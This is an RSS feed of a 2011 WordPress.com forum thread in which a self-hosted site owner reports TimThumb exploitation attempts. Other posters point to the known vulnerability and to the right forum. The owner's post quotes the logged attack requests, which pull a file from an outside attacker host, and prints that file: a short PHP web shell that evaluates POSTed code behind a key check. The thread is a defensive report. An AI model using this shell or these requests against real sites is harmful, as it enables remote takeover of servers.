<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="bbPress/1.1-alpha-2539" -->
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
		>
	<channel>
		<title>WordPress.com Forums &#187; Topic: New Hack Attempt on Self Hosted Wordpress Site!!</title>
		<link>http://en.forums.wordpress.com/topic/new-hack-attempt-on-self-hosted-wordpress-site</link>
		<description>WordPress.com Forums &#187; Topic: New Hack Attempt on Self Hosted Wordpress Site!!</description>
		<language>en</language>
		<pubDate>Thu, 23 May 2013 01:29:15 +0000</pubDate>
		<generator>http://bbpress.org/?v=1.1-alpha-2539</generator>
				<atom:link href="http://en.forums.wordpress.com/rss/topic/new-hack-attempt-on-self-hosted-wordpress-site" rel="self" type="application/rss+xml" />

		<item>
			<title>macmanx on "New Hack Attempt on Self Hosted WordPress Site!!"</title>
			<link>http://en.forums.wordpress.com/topic/new-hack-attempt-on-self-hosted-wordpress-site#post-680140</link>
			<pubDate>Thu, 25 Aug 2011 05:51:34 +0000</pubDate>
			<dc:creator>macmanx</dc:creator>
			<guid isPermaLink="false">680140@http://en.forums.wordpress.com/</guid>
			<description><![CDATA[<p>This is a well-known vulnerability in the Timthumb script, not WordPress.</p>
<p>See this for more details: <a href="http://ma.tt/2011/08/the-timthumb-saga/" rel="nofollow">http://ma.tt/2011/08/the-timthumb-saga/</a>
</p>
]]></description>
					</item>
		<item>
			<title>timethief on "New Hack Attempt on Self Hosted WordPress Site!!"</title>
			<link>http://en.forums.wordpress.com/topic/new-hack-attempt-on-self-hosted-wordpress-site#post-679606</link>
			<pubDate>Wed, 24 Aug 2011 18:33:21 +0000</pubDate>
			<dc:creator>timethief</dc:creator>
			<guid isPermaLink="false">679606@http://en.forums.wordpress.com/</guid>
			<description><![CDATA[<p>You are posting to the wrong support forum. We cannot help you here at WordPress.COM as we run on different software. please post to the correct forum forum your software. It's where the support bot points to <a href="http://wordpress.ORG/support/" rel="nofollow">http://wordpress.ORG/support/</a>
</p>
]]></description>
					</item>
		<item>
			<title>supportbot on "New Hack Attempt on Self Hosted WordPress Site!!"</title>
			<link>http://en.forums.wordpress.com/topic/new-hack-attempt-on-self-hosted-wordpress-site#post-679604</link>
			<pubDate>Wed, 24 Aug 2011 18:28:04 +0000</pubDate>
			<dc:creator>supportbot</dc:creator>
			<guid isPermaLink="false">679604@http://en.forums.wordpress.com/</guid>
			<description><![CDATA[<p>The blog you specified at pinchii.com does not appear to be hosted at WordPress.com.</p>
<p>This support forum is for blogs hosted at WordPress.com. If your question is about a self-hosted WordPress blog then you'll find help at the <a href="http://wordpress.org/support/">WordPress.org forums</a>.</p>
<p>If you don't understand the difference between WordPress.com and WordPress.org, you may find <a href="http://support.wordpress.com/com-vs-org/">this information</a> helpful.</p>
<p>If you forgot to include a link to your blog, you can reply and include it below.  It'll help people to answer your question.</p>
<p>This is an automated message.
</p>
]]></description>
					</item>
		<item>
			<title>pinchii on "New Hack Attempt on Self Hosted WordPress Site!!"</title>
			<link>http://en.forums.wordpress.com/topic/new-hack-attempt-on-self-hosted-wordpress-site#post-679603</link>
			<pubDate>Wed, 24 Aug 2011 18:28:03 +0000</pubDate>
			<dc:creator>pinchii</dc:creator>
			<guid isPermaLink="false">679603@http://en.forums.wordpress.com/</guid>
			<description><![CDATA[<p>Got this in my "hack prevention" scripts that I have running on the site</p>
<p>Remote Address:[removed]<br />
Remote Port:47762<br />
Request Method:GET<br />
Referer:<br />
Query String:<br />
Request URI:/home/wp-content/themes/mystique/thumb.php?src=http://blogger.com.bloggera.net/images.php<br />
User Agent:Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.62</p>
<p>And also </p>
<p>Remote Address:[removed]<br />
Remote Port:47764<br />
Request Method:GET<br />
Referer:<br />
Query String:<br />
Request URI:/home/wp-content/themes/mystique/timthumb.php?src=http://blogger.com.bloggera.net/images.php<br />
User Agent:Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.62</p>
<p>The content of the File "images.php" is </p>
<p>::::BINARY CODE PAYLOAD::::<br />
&#60;?php<br />
if(md5($_POST["key"]) == "f732d47960be7e806861987f98a9574c"){<br />
$cmd = $_POST["code"];<br />
eval (stripslashes($cmd));<br />
}<br />
?&#62;</p>
<p>Looks like they are trying to gain CMD on my Apache server</p>
<p>If you guys are getting the same, I suggest you block PHP files in your wp-content folder
</p>
]]></description>
					</item>

	</channel>
</rss>
